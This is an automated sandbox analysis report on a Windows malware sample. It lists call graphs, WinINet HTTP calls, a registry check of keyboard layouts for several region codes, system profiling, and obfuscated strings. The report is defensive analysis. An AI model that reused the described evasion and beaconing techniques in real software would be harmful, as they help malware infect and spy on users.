12791->12791 12792->12791 12794 3fc19a 12792->12794 12797 3e29e0 12794->12797 12796 3fc1b1 std::_Xinvalid_argument 12796->12792 12811 3fbddf 12797->12811 12799 3e29ff 12799->12796 12800 418a8f __cftof 4 API calls 12801 416c06 12800->12801 12803 416c23 12801->12803 12804 416c15 12801->12804 12802 3e29f4 12802->12799 12802->12800 12806 41689d 4 API calls 12803->12806 12805 416c79 9 API calls 12804->12805 12807 416c1f 12805->12807 12808 416c3d 12806->12808 12807->12796 12809 416c79 9 API calls 12808->12809 12810 416c51 __freea 12808->12810 12809->12810 12810->12796 12814 3fcb34 12811->12814 12815 3fcb42 InitOnceExecuteOnce 12814->12815 12817 3fbdf2 12814->12817 12815->12817 12817->12802 13064 416954 13065 416962 13064->13065 13066 41696c 13064->13066 13067 41689d 4 API calls 13066->13067 13068 416986 __freea 13067->13068 13159 416539 13160 4163d7 __cftof 2 API calls 13159->13160 13161 41654a 13160->13161 13173 3edfa0 recv 13174 3ee002 recv 13173->13174 13175 3ee037 recv 13174->13175 13176 3ee071 13175->13176 13177 3ee193 13176->13177 13178 3fc5af GetSystemTimePreciseAsFileTime 13176->13178 13179 3ee1ce 13178->13179 13180 3fc16d 10 API calls 13179->13180 13181 3ee238 13180->13181 13188 3ee3e0 13189 3ee406 13188->13189 13190 3ee3e9 13188->13190 13192 3ee240 13190->13192 13193 3ee250 __dosmaperr 13192->13193 13194 418959 4 API calls 13193->13194 13195 3ee28d std::_Xinvalid_argument 13194->13195 13196 3ee406 13195->13196 13197 3ee240 4 API calls 13195->13197 13196->13189 13197->13196 12621 3f1da0 12625 3f1e3b shared_ptr __dosmaperr 12621->12625 12622 3f1e48 12623 3ee410 5 API calls 12622->12623 12624 3f2906 shared_ptr std::_Xinvalid_argument 12623->12624 12625->12622 12625->12624 12638 418959 12625->12638 12628 3f2235 shared_ptr 12628->12624 12642 416639 12628->12642 12631 3f265b shared_ptr __dosmaperr 12631->12624 12632 418959 4 API calls 12631->12632 12633 3f2729 12632->12633 12633->12622 12633->12624 12634 3f27a1 12633->12634 12649 3ee410 12634->12649 12636 3f2813 12636->12624 12667 3e5dd0 12636->12667 12639 418974 12638->12639 12674 4186b7 12639->12674 12641 41897e 12641->12628 12698 416582 12642->12698 12644 3f264a 12644->12622 12645 4166c7 12644->12645 12646 4166d3 12645->12646 12647 4166dd __cftof __dosmaperr 12646->12647 12710 416650 12646->12710 12647->12631 12650 3ee459 12649->12650 12733 3ebd30 12650->12733 12652 3ee979 shared_ptr 12652->12636 12653 3ee6e1 12653->12652 12654 3ee410 5 API calls 12653->12654 12656 3ef666 12654->12656 12655 3ef862 shared_ptr 12655->12636 12656->12655 12657 3ee410 5 API calls 12656->12657 12659 3ef943 12657->12659 12658 3efa15 shared_ptr 12658->12636 12659->12658 12660 416639 RtlAllocateHeap 12659->12660 12661 3efbc1 12660->12661 12662 3ee410 5 API calls 12661->12662 12664 3f051c 12662->12664 12663 3f0760 shared_ptr 12663->12636 12664->12663 12665 3ee410 5 API calls 12664->12665 12666 3f11c9 12665->12666 12669 3e5e08 12667->12669 12668 3e5eee shared_ptr 12668->12624 12669->12668 12670 3e6040 RegOpenKeyExA 12669->12670 12672 3e643a shared_ptr 12670->12672 12673 3e6093 __cftof 12670->12673 12671 3e6133 RegEnumValueW 12671->12673 12672->12624 12673->12671 12673->12672 12675 4186c9 12674->12675 12676 41681a __cftof 4 API calls 12675->12676 12677 4186de __cftof __dosmaperr 12675->12677 12679 41870e 12676->12679 12677->12641 12679->12677 12680 418905 12679->12680 12681 418942 12680->12681 12682 418912 12680->12682 12691 41d2c9 12681->12691 12685 418921 __fassign 12682->12685 12686 41d2ed 12682->12686 12685->12679 12687 41681a __cftof 4 API calls 12686->12687 12688 41d30a 12687->12688 12690 41d31a 12688->12690 12695 41f05f 12688->12695 12690->12685 12692 41d2d4 12691->12692 12693 41b49b __cftof 4 API calls 12692->12693 12694 41d2e4 12693->12694 12694->12685 12696 41681a __cftof 4 API calls 12695->12696 12697 41f07f __cftof __fassign __freea 12696->12697 12697->12690 12699 41658e 12698->12699 12701 416595 __cftof __dosmaperr 12699->12701 12702 41a763 12699->12702 12701->12644 12703 41a76f 12702->12703 12706 41a807 12703->12706 12705 41a78a 12705->12701 12708 41a82a 12706->12708 12707 41d6cf RtlAllocateHeap 12709 41a870 __freea 12707->12709 12708->12707 12708->12709 12709->12705 12711 416672 12710->12711 12713 41665d __cftof __dosmaperr __freea 12710->12713 12711->12713 12714 419ed9 12711->12714 12713->12647 12715 419f16 12714->12715 12716 419ef1 12714->12716 12715->12713 12716->12715 12718 4202d8 12716->12718 12719 4202e4 12718->12719 12720 4202ec __cftof __dosmaperr 12719->12720 12722 4203ca 12719->12722 12720->12715 12723 4203f0 __cftof __dosmaperr 12722->12723 12724 4203ec 12722->12724 12723->12720 12724->12723 12726 41fb5f 12724->12726 12727 41fbac 12726->12727 12728 41681a __cftof 4 API calls 12727->12728 12729 41fbbb __cftof 12728->12729 12730 41fe5b 12729->12730 12731 41d2c9 4 API calls 12729->12731 12732 41c4ca GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 12729->12732 12730->12723 12731->12729 12732->12729 12734 3ebd82 12733->12734 12736 3ec11e shared_ptr 12733->12736 12735 3ebd96 InternetOpenW InternetConnectA 12734->12735 12734->12736 12737 3ebe0d 12735->12737 12736->12653 12738 3ebe23 HttpOpenRequestA 12737->12738 12739 3ebe41 shared_ptr 12738->12739 12740 3ebee3 HttpSendRequestA 12739->12740 12741 3ebefb shared_ptr 12740->12741 12987 3f92e0 12988 3f92f5 12987->12988 12992 3f9333 12987->12992 12993 3fd017 12988->12993 12990 3f92ff 12990->12992 12997 3fcfcd 12990->12997 12995 3fd028 12993->12995 12994 3fd030 12994->12990 12995->12994 13001 3fd09f 12995->13001 12999 3fcfdd 12997->12999 12998 3fd085 12998->12992 12999->12998 13000 3fd081 RtlWakeAllConditionVariable 12999->13000 13000->12992 13002 3fd0ad SleepConditionVariableCS 13001->13002 13004 3fd0c6 13001->13004 13002->13004 13004->12995

                    Executed Functions

                    Function 003F4690 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                    • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$stoi argument out of range$eBs
                    • API String ID: 3545240790-3136512537
                    • Opcode ID: f55ddcdc9cfea38b7813826ae3574a916f6d560bbe71b1aebf7d1f61cd037abd
                    • Instruction ID: 2b2eb45ec27ec355595aa1363d3ad5fadc776b019884c7b96fe60b0f8ed393f0
                    • Opcode Fuzzy Hash: f55ddcdc9cfea38b7813826ae3574a916f6d560bbe71b1aebf7d1f61cd037abd
                    • Instruction Fuzzy Hash: 9E230771E1025C8BEB1ADB28CD4A7ADBB769F81304F5482D8E108AB2D2DB755F84CF51
                    Function 003EBD30 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 310networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 760 3ebd30-3ebd7c 761 3ebd82-3ebd86 760->761 762 3ec171-3ec196 call 3f7f00 760->762 761->762 764 3ebd8c-3ebd90 761->764 767 3ec198-3ec1a4 762->767 768 3ec1c4-3ec1dc 762->768 764->762 766 3ebd96-3ebe1f InternetOpenW InternetConnectA call 3f7840 call 3e5b00 764->766 794 3ebe23-3ebe3f HttpOpenRequestA 766->794 795 3ebe21 766->795 770 3ec1ba-3ec1c1 call 3fd569 767->770 771 3ec1a6-3ec1b4 767->771 772 3ec128-3ec140 768->772 773 3ec1e2-3ec1ee 768->773 770->768 771->770 775 3ec23f-3ec244 call 416b7a 771->775 780 3ec146-3ec152 772->780 781 3ec213-3ec22f call 3fcef4 772->781 777 3ec11e-3ec125 call 3fd569 773->777 778 3ec1f4-3ec202 773->778 777->772 778->775 785 3ec204 778->785 787 3ec158-3ec166 780->787 788 3ec209-3ec210 call 3fd569 780->788 785->777 787->775 796 3ec16c 787->796 788->781 798 3ebe70-3ebedf call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 794->798 799 3ebe41-3ebe50 794->799 795->794 796->788 812 3ebee3-3ebef9 HttpSendRequestA 798->812 813 3ebee1 798->813 800 3ebe66-3ebe6d call 3fd569 799->800 801 3ebe52-3ebe60 799->801 800->798 801->800 814 3ebf2a-3ebf52 812->814 815 3ebefb-3ebf0a 812->815 813->812 818 3ebf54-3ebf63 814->818 819 3ebf83-3ebfaa 814->819 816 3ebf0c-3ebf1a 815->816 817 3ebf20-3ebf27 call 3fd569 815->817 816->817 817->814 821 3ebf79-3ebf80 call 3fd569 818->821 822 3ebf65-3ebf73 818->822 828 3ebfb0-3ec060 call 414160 819->828 821->819 822->821
                    APIs
                    • InternetOpenW.WININET(00438D18,00000000,00000000,00000000,00000000), ref: 003EBDBC
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 003EBDE0
                    • HttpOpenRequestA.WININET(?,00000000), ref: 003EBE2B
                    • HttpSendRequestA.WININET(?,00000000), ref: 003EBEEB
                    • InternetCloseHandle.WININET(?), ref: 003EC077
                    • InternetCloseHandle.WININET(?), ref: 003EC07F
                    • InternetCloseHandle.WININET(?), ref: 003EC087
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectSend
                    • String ID: UfNm$Ux1MTw==$aAJTaDE6OpZ=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range$3D$eBs$eBs$eBs
                    • API String ID: 3319208088-2617655494
                    • Opcode ID: 3f921865a36b1e3fc646c6865729cf59c3e465418ad0817d8d759c699f46b7f7
                    • Instruction ID: 6f6eec2da20ee53f47600f90c0acdfeab66c13cd9c8378b67a9cf03c23764c39
                    • Opcode Fuzzy Hash: 3f921865a36b1e3fc646c6865729cf59c3e465418ad0817d8d759c699f46b7f7
                    • Instruction Fuzzy Hash: B1B116B1A101689BDB26CF29CC85BEEBB79EF45304F504698F608972C1D7749AC1CF94
                    Function 003E5DD0 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 364COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 916 3e5dd0-3e5ece 922 3e5ef8-3e5f05 call 3fcef4 916->922 923 3e5ed0-3e5edc 916->923 925 3e5eee-3e5ef5 call 3fd569 923->925 926 3e5ede-3e5eec 923->926 925->922 926->925 928 3e5f06-3e608d call 416b7a call 3fe060 call 3f7f00 * 5 RegOpenKeyExA 926->928 945 3e6458-3e6461 928->945 946 3e6093-3e6123 call 414000 928->946 948 3e648e-3e6497 945->948 949 3e6463-3e646e 945->949 972 3e6129-3e612d 946->972 973 3e6446-3e6452 946->973 950 3e6499-3e64a4 948->950 951 3e64c4-3e64cd 948->951 953 3e6484-3e648b call 3fd569 949->953 954 3e6470-3e647e 949->954 955 3e64ba-3e64c1 call 3fd569 950->955 956 3e64a6-3e64b4 950->956 957 3e64cf-3e64da 951->957 958 3e64fa-3e6503 951->958 953->948 954->953 959 3e657e-3e6583 call 416b7a 954->959 955->951 956->955 956->959 963 3e64dc-3e64ea 957->963 964 3e64f0-3e64f7 call 3fd569 957->964 966 3e652c-3e6535 958->966 967 3e6505-3e6510 958->967 963->959 963->964 964->958 969 3e6537-3e6546 966->969 970 3e6562-3e657d call 3fcef4 966->970 976 3e6522-3e6529 call 3fd569 967->976 977 3e6512-3e6520 967->977 979 3e6558-3e655f call 3fd569 969->979 980 3e6548-3e6556 969->980 981 3e6133-3e6167 RegEnumValueW 972->981 982 3e6440 972->982 973->945 976->966 977->959 977->976 979->970 980->959 980->979 987 3e642d-3e6434 981->987 988 3e616d-3e618d 981->988 982->973 987->981 991 3e643a 987->991 993 3e6190-3e6199 988->993 991->982 993->993 994 3e619b-3e622d call 3f7c20 call 3f8350 call 3f7840 * 2 call 3e5c40 993->994 994->987
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$eBs
                    • API String ID: 0-2087237169
                    • Opcode ID: 7f9a243c663623368d1d0ac6b9a5ec7408130504f7b58df3a266d8fb7a72e97a
                    • Instruction ID: e36895a7e892d939e3a1d0004444fedb51ca8c4872ba7ae9f1f898a04e57325c
                    • Opcode Fuzzy Hash: 7f9a243c663623368d1d0ac6b9a5ec7408130504f7b58df3a266d8fb7a72e97a
                    • Instruction Fuzzy Hash: B3E1CF71900268ABEB26DFA4CC89BEEB779AB14304F5042D9E508A72D1D774AFC4CF51
                    Function 003E7CE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 392COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1004 3e7ce0-3e7d62 call 414000 1008 3e825e-3e827b call 3fcef4 1004->1008 1009 3e7d68-3e7d90 call 3f7840 call 3e5b00 1004->1009 1016 3e7d94-3e7db6 call 3f7840 call 3e5b00 1009->1016 1017 3e7d92 1009->1017 1022 3e7dba-3e7dd3 1016->1022 1023 3e7db8 1016->1023 1017->1016 1026 3e7e04-3e7e2f 1022->1026 1027 3e7dd5-3e7de4 1022->1027 1023->1022 1030 3e7e60-3e7e81 1026->1030 1031 3e7e31-3e7e40 1026->1031 1028 3e7dfa-3e7e01 call 3fd569 1027->1028 1029 3e7de6-3e7df4 1027->1029 1028->1026 1029->1028 1032 3e827c call 416b7a 1029->1032 1036 3e7e87-3e7e8c 1030->1036 1037 3e7e83-3e7e85 GetNativeSystemInfo 1030->1037 1034 3e7e56-3e7e5d call 3fd569 1031->1034 1035 3e7e42-3e7e50 1031->1035 1045 3e8281-3e8286 call 416b7a 1032->1045 1034->1030 1035->1032 1035->1034 1041 3e7e8d-3e7e96 1036->1041 1037->1041 1043 3e7e98-3e7e9f 1041->1043 1044 3e7eb4-3e7eb7 1041->1044 1047 3e8259 1043->1047 1048 3e7ea5-3e7eaf 1043->1048 1049 3e81ff-3e8202 1044->1049 1050 3e7ebd-3e7ec6 1044->1050 1047->1008 1052 3e8254 1048->1052 1049->1047 1055 3e8204-3e820d 1049->1055 1053 3e7ec8-3e7ed4 1050->1053 1054 3e7ed9-3e7edc 1050->1054 1052->1047 1053->1052 1057 3e81dc-3e81de 1054->1057 1058 3e7ee2-3e7ee9 1054->1058 1059 3e820f-3e8213 1055->1059 1060 3e8234-3e8237 1055->1060 1061 3e81ec-3e81ef 1057->1061 1062 3e81e0-3e81ea 1057->1062 1063 3e7eef-3e7f4b call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 1058->1063 1064 3e7fc9-3e81c5 call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 call 3f7840 call 3e5b00 call 3e5620 call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 call 3f7840 call 3e5b00 call 3e5620 call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 call 3f7840 call 3e5b00 call 3e5620 1058->1064 1065 3e8228-3e8232 1059->1065 1066 3e8215-3e821a 1059->1066 1067 3e8239-3e8243 1060->1067 1068 3e8245-3e8251 1060->1068 1061->1047 1070 3e81f1-3e81fd 1061->1070 1062->1052 1089 3e7f50-3e7f57 1063->1089 1104 3e81cb-3e81d4 1064->1104 1065->1047 1066->1065 1072 3e821c-3e8226 1066->1072 1067->1047 1068->1052 1070->1052 1072->1047 1091 3e7f5b-3e7f7b call 418a61 1089->1091 1092 3e7f59 1089->1092 1098 3e7f7d-3e7f8c 1091->1098 1099 3e7fb2-3e7fb4 1091->1099 1092->1091 1101 3e7f8e-3e7f9c 1098->1101 1102 3e7fa2-3e7faf call 3fd569 1098->1102 1103 3e7fba-3e7fc4 1099->1103 1099->1104 1101->1045 1101->1102 1102->1099 1103->1104 1104->1049 1106 3e81d6 1104->1106 1106->1057
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003E7E83
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: McsqLc==$McsqMM==$McsrKc==$eBs
                    • API String ID: 1721193555-2571449117
                    • Opcode ID: eb463d1f6a165a198d20a8a784bcff3f21bfef6bc79f64a5a792046b1f9d9504
                    • Instruction ID: ab5ccf1180b741edec79387254bd49aa229c1f311537b6ed995c2074bcada78d
                    • Opcode Fuzzy Hash: eb463d1f6a165a198d20a8a784bcff3f21bfef6bc79f64a5a792046b1f9d9504
                    • Instruction Fuzzy Hash: 08D10871E006A89BDF16BF69DD477AD7B61AB42314F9003D8E4096B3C2DB744E8487C2
                    Function 00416DE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1142 416de1-416e16 GetFileType 1143 416e1c-416e27 1142->1143 1144 416ece-416ed1 1142->1144 1145 416e49-416e65 call 414000 GetFileInformationByHandle 1143->1145 1146 416e29-416e3a call 417157 1143->1146 1147 416ed3-416ed6 1144->1147 1148 416efa-416f22 1144->1148 1157 416eeb-416ef8 call 4173ed 1145->1157 1163 416e6b-416ead call 4170a9 call 416f51 * 3 1145->1163 1160 416e40-416e47 1146->1160 1161 416ee7-416ee9 1146->1161 1147->1148 1153 416ed8-416eda 1147->1153 1149 416f24-416f37 1148->1149 1150 416f3f-416f41 1148->1150 1149->1150 1165 416f39-416f3c 1149->1165 1155 416f42-416f50 call 3fcef4 1150->1155 1153->1157 1158 416edc-416ee1 call 417423 1153->1158 1157->1161 1158->1161 1160->1145 1161->1155 1178 416eb2-416eca call 417076 1163->1178 1165->1150 1178->1150 1181 416ecc 1178->1181 1181->1161
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00416E03
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00416E5D
                    • __dosmaperr.LIBCMT ref: 00416EF2
                      • Part of subcall function 00417157: __dosmaperr.LIBCMT ref: 0041718C
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$HandleInformationType
                    • String ID: eBs
                    • API String ID: 2531987475-1845495228
                    • Opcode ID: b43ad257c7d4fceacea10976f0dbe37428ec5fdaba41228bb2a4f2a6cc4ddcbd
                    • Instruction ID: 327f44ca7dce930b2012638765cbd98cd594cf944708ae47cbd2cffe13e60052
                    • Opcode Fuzzy Hash: b43ad257c7d4fceacea10976f0dbe37428ec5fdaba41228bb2a4f2a6cc4ddcbd
                    • Instruction Fuzzy Hash: 2F416D75900308ABDF24DFA6D8419EBBBF9EF89304B11452EF956D3610EB34E885CB25
                    Function 0041D4D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1182 41d4d4-41d4f5 call 3fde90 1185 41d4f7 1182->1185 1186 41d50f-41d512 1182->1186 1187 41d4f9-41d4ff 1185->1187 1188 41d52e-41d53a call 41a668 1185->1188 1186->1188 1189 41d514-41d517 1186->1189 1190 41d501-41d505 1187->1190 1191 41d523-41d52c call 41d41c 1187->1191 1202 41d544-41d550 call 41d45e 1188->1202 1203 41d53c-41d53f 1188->1203 1189->1191 1192 41d519-41d51c 1189->1192 1190->1188 1194 41d507-41d50b 1190->1194 1206 41d56c-41d575 1191->1206 1195 41d552-41d562 call 417423 call 416b6a 1192->1195 1196 41d51e-41d521 1192->1196 1194->1195 1199 41d50d 1194->1199 1195->1203 1196->1191 1196->1195 1199->1191 1202->1195 1212 41d564-41d569 1202->1212 1207 41d6ab-41d6ba 1203->1207 1210 41d582-41d593 1206->1210 1211 41d577-41d57f call 418c6b 1206->1211 1215 41d595-41d5a7 1210->1215 1216 41d5a9 1210->1216 1211->1210 1212->1206 1218 41d5ab-41d5bc 1215->1218 1216->1218 1219 41d62a-41d63a call 41d667 1218->1219 1220 41d5be-41d5c0 1218->1220 1229 41d6a9 1219->1229 1230 41d63c-41d63e 1219->1230 1222 41d5c6-41d5c8 1220->1222 1223 41d6bb-41d6bd 1220->1223 1225 41d5d4-41d5e0 1222->1225 1226 41d5ca-41d5cd 1222->1226 1227 41d6c7-41d6da call 4164fd 1223->1227 1228 41d6bf-41d6c6 call 418cb3 1223->1228 1232 41d620-41d628 1225->1232 1233 41d5e2-41d5f7 call 41d4cb * 2 1225->1233 1226->1225 1231 41d5cf-41d5d2 1226->1231 1250 41d6e8-41d6ee 1227->1250 1251 41d6dc-41d6e6 1227->1251 1228->1227 1229->1207 1236 41d640-41d656 call 41a511 1230->1236 1237 41d679-41d682 1230->1237 1231->1225 1238 41d5fa-41d5fc 1231->1238 1232->1219 1233->1238 1261 41d685-41d688 1236->1261 1237->1261 1238->1232 1244 41d5fe-41d60e 1238->1244 1249 41d610-41d615 1244->1249 1249->1219 1256 41d617-41d61e 1249->1256 1253 41d6f0-41d6f1 1250->1253 1254 41d707-41d718 RtlAllocateHeap 1250->1254 1251->1250 1252 41d71c-41d727 call 417423 1251->1252 1263 41d729-41d72b 1252->1263 1253->1254 1258 41d6f3-41d6fa call 419c61 1254->1258 1259 41d71a 1254->1259 1256->1249 1258->1252 1272 41d6fc-41d705 call 418cd9 1258->1272 1259->1263 1265 41d694-41d69c 1261->1265 1266 41d68a-41d68d 1261->1266 1265->1229 1268 41d69e-41d6a6 call 41a511 1265->1268 1266->1265 1267 41d68f-41d692 1266->1267 1267->1229 1267->1265 1268->1229 1272->1252 1272->1254
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
